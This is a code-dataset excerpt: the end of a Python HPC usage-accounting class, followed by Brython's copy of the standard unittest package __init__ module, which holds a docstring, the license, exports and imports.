return [fu.result() for fu in concurrent.futures.as_completed(fs)], 'tenant'
else:
return [], 'tenant'
class HpcUsage(Usage):
"""Calculates HPC Usage in a time period."""
def __init__(self, start, end, crm_client):
super().__init__(start, end)
self.crm_client = crm_client
self.usage_meta = array_to_dict(self.crm_client.get('/access/'), 'username')
def _get_managing_orgs_of(self, identifier):
"""Override parent method as the usage meta is not from Orders,
therefore there is no managerunit but unit as the secondary
"""
return super()._get_managing_orgs_of(identifier, 'unit')
def prepare(self):
return hpc.Job.list(self.start_timestamp, self.end_timestamp), 'owner'
|
40223110/2015cda_0512
|
refs/heads/master
|
static/Brython3.1.0-20150301-090019/Lib/unittest/__init__.py
|
900
|
"""
Python unit testing framework, based on Erich Gamma's JUnit and Kent Beck's
Smalltalk testing framework.
This module contains the core framework classes that form the basis of
specific test cases and suites (TestCase, TestSuite etc.), and also a
text-based utility class for running the tests and reporting the results
(TextTestRunner).
Simple usage:
import unittest
class IntegerArithmeticTestCase(unittest.TestCase):
def testAdd(self): ## test method names begin 'test*'
self.assertEqual((1 + 2), 3)
self.assertEqual(0 + 1, 1)
def testMultiply(self):
self.assertEqual((0 * 10), 0)
self.assertEqual((5 * 8), 40)
if __name__ == '__main__':
unittest.main()
Further information is available in the bundled documentation, and from
http://docs.python.org/library/unittest.html
Copyright (c) 1999-2003 Steve Purcell
Copyright (c) 2003-2010 Python Software Foundation
This module is free software, and you may redistribute it and/or modify
it under the same terms as Python itself, so long as this copyright message
and disclaimer are retained in their original form.
IN NO EVENT SHALL THE AUTHOR BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT,
SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OF
THIS CODE, EVEN IF THE AUTHOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
DAMAGE.
THE AUTHOR SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE. THE CODE PROVIDED HEREUNDER IS ON AN "AS IS" BASIS,
AND THERE IS NO OBLIGATION WHATSOEVER TO PROVIDE MAINTENANCE,
SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
"""
__all__ = ['TestResult', 'TestCase', 'TestSuite',
'TextTestRunner', 'TestLoader', 'FunctionTestCase', 'main',
'defaultTestLoader', 'SkipTest', 'skip', 'skipIf', 'skipUnless',
'expectedFailure', 'TextTestResult', 'installHandler',
'registerResult', 'removeResult', 'removeHandler']
# Expose obsolete functions for backwards compatibility
__all__.extend(['getTestCaseNames', 'makeSuite', 'findTestCases'])
__unittest = True
from .result import TestResult
from .case import (TestCase, FunctionTestCase, SkipTest, skip, skipIf,
skipUnless, expectedFailure)
from .suite import BaseTestSuite, TestSuite
from .loader import (TestLoader, defaultTestLoader, makeSuite, getTestCaseNames,
findTestCases)
from .main import TestProgram, main
from .runner import TextTestRunner, TextTestResult
from .signals import installHandler, registerResult, removeResult, removeHandler
# deprecated
_TextTestResult = TextTestResult
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.